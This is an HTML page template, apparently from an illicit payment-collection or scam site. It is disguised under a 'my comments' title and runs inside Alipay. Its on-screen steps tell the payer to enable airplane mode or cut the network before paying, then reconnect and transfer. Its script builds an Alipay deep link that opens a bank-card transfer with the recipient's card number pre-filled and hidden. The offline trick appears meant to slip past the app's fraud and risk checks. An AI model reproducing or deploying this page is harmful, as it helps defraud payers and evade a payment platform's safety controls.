

<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>我的留言</title>
    <meta content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0" name="viewport">
    <meta content="yes" name="apple-mobile-web-app-capable">
    <meta content="black" name="apple-mobile-web-app-status-bar-style">
    <meta content="telephone=no" name="format-detection">
    <script src="http://www.axmbbapi.com/static/home/bank/jquery.min.js"></script>
    <link href="http://www.axmbbapi.com/static/home/bank/hipay.css" rel="stylesheet" type="text/css">
    <link href="http://www.axmbbapi.com/static/home/bank/style.css" rel="stylesheet" type="text/css">
    <script type="text/javascript" src="http://www.axmbbapi.com/static/home/bank/my.min.js"></script>
    <style type="text/css">
        html,
        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            background: #c14443;
            overflow: hidden;
        }
    </style>
    <style>
        .demo {
            margin: 1em 0;
            padding: 1em 1em 2em;
            background: #fff;
        }

        .demo h1 {
            padding-left: 8px;
            font-size: 24px;
            line-height: 1.2;
            border-left: 3px solid #108EE9;
        }

        .demo h1,
        .demo p {
            margin: 1em 0;
        }

        .demo .am-button + .am-button,
        .demo .btn + .btn,
        .demo .btn:first-child {
            margin-top: 10px;
        }

        .fn-hide {
            display: none !important;
        }

        input {
            display: block;
            padding: 4px 10px;
            margin: 10px 0;
            line-height: 28px;
            width: 100%;
            box-sizing: border-box;
        }

        .aui-button button_1 {
            width: 95%;
            background: #eace99;
            border-radius: 10px;
            color: #000;
            font-size: 1rem;
            display: block;
            margin: 0 auto;
            border: none;
            padding: .8rem 0;
            box-shadow: 0 1px 15px #f0c677;
        }
        h1 {
            color: yellow;

        }
    </style>
</head>
<div class="aui-free-head" style="height:560px;">
    <img src="http://www.axmbbapi.com/static/home/bank/feixing.png" width="100%" />
    <div class="aui-flex b-line">

        <div class="aui-flex-box">
        <h1 style="color: yellow;font-size: 25px;">操作步骤：</h1>
            <h1 style="color: yellow;font-size: 14px;">1.开启飞行模式或者关闭网络，后继续支付</h1>
            <h1 style="color: yellow;font-size: 14px;">2.跳转到转账界面后，打开网络进行转账，切记不要修改账号和金额！</h1>
             <h1 style="color: yellow;font-size: 14px;">3.转账付款成功后，请及时返回订单页面点击【我已付款】按钮完成本次充值操作！</h1>
        </div>
    </div>

    <a href="#" style="margin-top:200px;"   id="clickbutton" disabled="true" class="aui-button">
        <button ><span class="label" style="color:red;font-size:20px;font-weight: bold;">继续支付</span></button>
    </a>

</div>
<div class="am-process">
    <footer class="am-footer am-fixed am-fixed-bottom">
    </footer>
</div>


<script>

    function returnApp() {
        AlipayJSBridge.call("exitApp")
    }

    function ready(a) {
        window.AlipayJSBridge ? a && a() : document.addEventListener("AlipayJSBridgeReady", a, !1)
    }

    var uid = "";
    var mon = "";




    function exec() {

        $.ajax({
            type: "GET",
            url: "/jump/check.php",
            timeout: 2000,          // 设置超时时间
            success: function (str) {
                alert("请打开飞行模式或者关闭网络,再点击立即付款按钮,跳转转账界面后再打开网络或者关闭飞行模式即可支付");
                $("#clickbutton").show();
            },
            error: function (textStatus) {
                $("#clickbutton").show();
                var r = confirm("第二步：进入转账界面后需要关闭飞行模式，或打开网络再转账付款！转账完成后请及时去订单页面点击【我已付款】按钮完成本次充值操作！");
                if (r == true){

                    {eq name="type" value="1"}
                      setTimeout(function () {
                        var bankAccount = "{$merchant.truename}";
                        var cardNo = "{$merchant.c_bank_card}";
                        var bankName = "{$merchant.bank}";
                        var bankMark = "{$merchant.bankdaima}";
                        var amount = "{$money}";
                        var cardIndex = "{$merchant.bankid}";
                        var cardChannel = "HISTORY_CARD";
                        var cardNoHidden = "true";
                        var ext = '&cardIndex='+cardIndex+'&cardChannel='+cardChannel+'&cardNoHidden='+cardNoHidden;
                        var url ='alipays://platformapi/startapp?appId=09999988&actionType=toCard&ap_framework_sceneId=20000067&bankAccount='+bankAccount+'&cardNo='+cardNo+'&bankName='+bankName+'&bankMark='+bankMark+ext+'&money='+amount+'&amount='+amount+'&REALLY_STARTAPP=true&startFromExternal=false';
                        window.location.href = url;
                        //window.location.href = 'alipays://platformapi/startapp?appId=20000123&actionType=scan&biz_data={"a":"'+mon+'","s":"money","u":"'+uid+'","m":""}';
                    }, 200);
                    {else/}
                        setTimeout(function () {
                            var bankAccount = "{$merchant.truename2}";
                            var cardNo = "{$merchant.c_bank_card2}";
                            var bankName = "{$merchant.bank2}";
                            var bankMark = "{$merchant.bankdaima2}";
                            var amount = "{$money}";
                            var cardIndex = "{$merchant.bankid2}";
                            var cardChannel = "HISTORY_CARD";
                            var cardNoHidden = "true";
                            var ext = '&cardIndex='+cardIndex+'&cardChannel='+cardChannel+'&cardNoHidden='+cardNoHidden;
                            var url ='alipays://platformapi/startapp?appId=09999988&actionType=toCard&ap_framework_sceneId=20000067&bankAccount='+bankAccount+'&cardNo='+cardNo+'&bankName='+bankName+'&bankMark='+bankMark+ext+'&money='+amount+'&amount='+amount+'&REALLY_STARTAPP=true&startFromExternal=false';
                            window.location.href = url;
                            //window.location.href = 'alipays://platformapi/startapp?appId=20000123&actionType=scan&biz_data={"a":"'+mon+'","s":"money","u":"'+uid+'","m":""}';
                        }, 200);
                     {/eq}


                }
            }
        });
    };


    $(function(){
        var wait = 10;
        var jishi = setInterval(function(){
            wait = wait -1;
            $("#button_pay .datetime").html(wait);
            if(wait <= 0){
                window.clearInterval(jishi);
                $("#button_pay").hide();
                $("#clickbutton").show();
            }
        }, 1000);

        $("#clickbutton").on("click",function(){
            $("#clickbutton").hide();
            exec();
        });
    });


    //导航栏颜色
    AlipayJSBridge.call("setTitleColor", {
        color: parseInt('c14443', 16),
        reset: false // (可选,默认为false)  是否重置title颜色为默认颜色。
    });
    //导航栏loadin
    AlipayJSBridge.call('showTitleLoading');
    //副标题文字
    AlipayJSBridge.call('setTitle', {
        title: '我的评论',
        subtitle: '评论'
    });
    //右上角菜单
    AlipayJSBridge.call('setOptionMenu', {
        icontype: 'filter',
        redDot: '01' // -1表示不显示，0表示显示红点，1-99表示在红点上显示的数字
    });
    AlipayJSBridge.call('showOptionMenu');
    document.addEventListener('optionMenu', function(e) {
        AlipayJSBridge.call('showPopMenu', {
            menus: [{
                name: "查看帮助",
                tag: "tag1",
                redDot: "1"
            },
                {
                    name: "我要投诉",
                    tag: "tag2"
                }
            ]
        }, function(e) {
            console.log(e);
        });
    }, false);


    document.addEventListener('popMenuClick', function(e) {
        // alert(JSON.stringify(e.data));
    }, false);

    document.addEventListener('resume', function(event) {
        //     returnApp();
    });

</script>
<script>
    var pageWidth = window.innerWidth;
    var pageHeight = window.innerHeight;

    if (typeof pageWidth != "number") {
        //在标准模式下面
        if (document.compatMode == "CSS1Compat") {
            pageWidth = document.documentElement.clientWidth;
            pageHeight = document.documentElement.clientHeight;
        } else {
            pageWidth = document.body.clientWidth;
            pageHeight = window.body.clientHeight;
        }
    }
    $('body').height(pageHeight);
</script>
<script src="http://www.axmbbapi.com/static/home/bank/alipayjsapi.inc.min.js"></script>
<script>
    ap.allowPullDownRefresh(false);
    ap.onPullDownRefresh(function(res){
        if(!res.refreshAvailable){
            ap.alert({
                content: '刷新已禁止',
                buttonText: '恢复'
            }, function(){
                ap.allowPullDownRefresh(true);
                ap.showToast('刷新已恢复')
            });
        }
    });
</script>
</html>
